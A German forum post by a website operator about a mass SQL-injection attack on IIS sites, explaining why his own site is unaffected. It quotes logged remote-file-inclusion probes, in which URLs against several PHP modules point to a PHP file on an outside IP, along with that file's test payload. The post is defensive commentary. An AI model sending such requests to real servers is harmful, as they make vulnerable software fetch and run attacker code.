Danke für den Hinweis, Server-Daten läuft auf einem IIS.
Ich fühle mich da aber nicht betroffen
Aus dem verlinkten Artikel:
QUOTE Some analyses of the IIS attack suggest that it is directed at a third-party ad management script found on these sites.
Sprich: Ein Script eines Drittanbieters, das wohl Sql-Injektionen zuläßt. Dummerweise sind innerhalb von Server-Daten die meisten Seiten von der Endung .html und alle Db-Zugriffe laufen strikt über gespeicherte Prozeduren - nix mit Sql-Injections.
Grade mal meine Logs nach 'campaign' gescannt - nichts zu finden, das gibt es nur ab und zu als Schlüssel innerhalb eines Opera-Browsers
Ich kann dafür eine ganze Sammlung von hackbarer Software anbieten:
QUOTE /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://208.77.221.130
/dig.jpg
/docebo/doceboLms/class/class.dashboard_lms.php?where_framework=http://208
.77.221.130/dig.jpg
/hpmaker/index.php?page=http://208.77.221.130/dig.jpg
Da es diese PHP-Dateien nicht gibt, kriege ich jedesmal eine Mail und bin deshalb wunderbar auf dem Laufenden, was die Scriptkiddies alles so treiben.
Wenn man sich das dig.jpg mal direkt holt (nicht per Browser, sondern per Download.exe!
, dann ist das so eine typische Hackersequenz:
QUOTE <?php
echo ("UstupidMF hacked you"
;
?>
Bloß: So etwas ist noch nicht mal ein richtiger Hack. Aber wahrscheinlich dient das nur als Überprüfung auf die Lücke, der Hack folgt dann.
PS: Im Windows-Bereich entwickelt sich dieselbe Logik wie innerhalb der 'klassischen OpenSource': Daß es irgendwelche schlampig programmierte Erweiterungen gibt, die sich dann massenhaft verbreiten und dann solche Massenhacks ermöglichen.
